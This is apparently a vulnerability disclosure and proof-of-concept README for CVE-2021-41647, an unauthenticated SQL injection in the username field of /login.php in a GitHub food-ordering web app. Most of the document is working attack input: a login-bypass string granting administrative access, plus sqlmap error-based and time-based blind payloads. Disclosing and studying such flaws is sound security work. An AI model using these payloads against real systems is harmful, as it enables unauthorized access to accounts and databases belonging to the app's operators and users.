# CVE-2021-41647
CVE-2021-41647 SQL Injection in Online-Food-Ordering-Web-App
The Online-Food-Ordering-Web-App is vulnerable to un-authenticated error and time-based blind SQL Injection attacks.
The username parameter on the /login.php page does not sanitize the user input, an attacker is able to bypass the login using a simple bypass technique.
## Link To Application
[Online-Food-Ordering-Web-App](https://github.com/kaushikjadhav01/Online-Food-Ordering-Web-App)
## Affected Components & Parameter
**URL: /login.php**
**PARAMETER: username**
## POC'S
### LOGIN BYPASS PAYLOAD
To bypass the user login and gain full administrative access, payload in the username input field:
user' or 1=1-- -
### SQLMAP PAYLOADS
Parameter: username (POST Request)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: `username=test'||(SELECT 0x6d65686d WHERE 8694=8694 AND (SELECT 8639 FROM(SELECT COUNT(*),CONCAT(0x71626a7a71,(SELECT (ELT(8639=8639,1))),0x71766a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=asdfasdrf`
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: `username=test'||(SELECT 0x6d6d6367 WHERE 7580=7580 AND (SELECT 4416 FROM (SELECT(SLEEP(5)))nUhT))||'&password=asdfasdrf`
### If the POC Image is unclear, please click on the GIF which will load in a better resolution.
## Discovered by
Jason Colyvas
[MOBIUSBINARY](https://mobiusbinary.com)
September 20th, 2021
[4.0K] /data/pocs/ca05986bf709f8d87516d3a26fc2712d2106f367
├── [9.7M] Online-Food-Ordering-Web-App.gif
└── [1.6K] README.md
0 directories, 2 files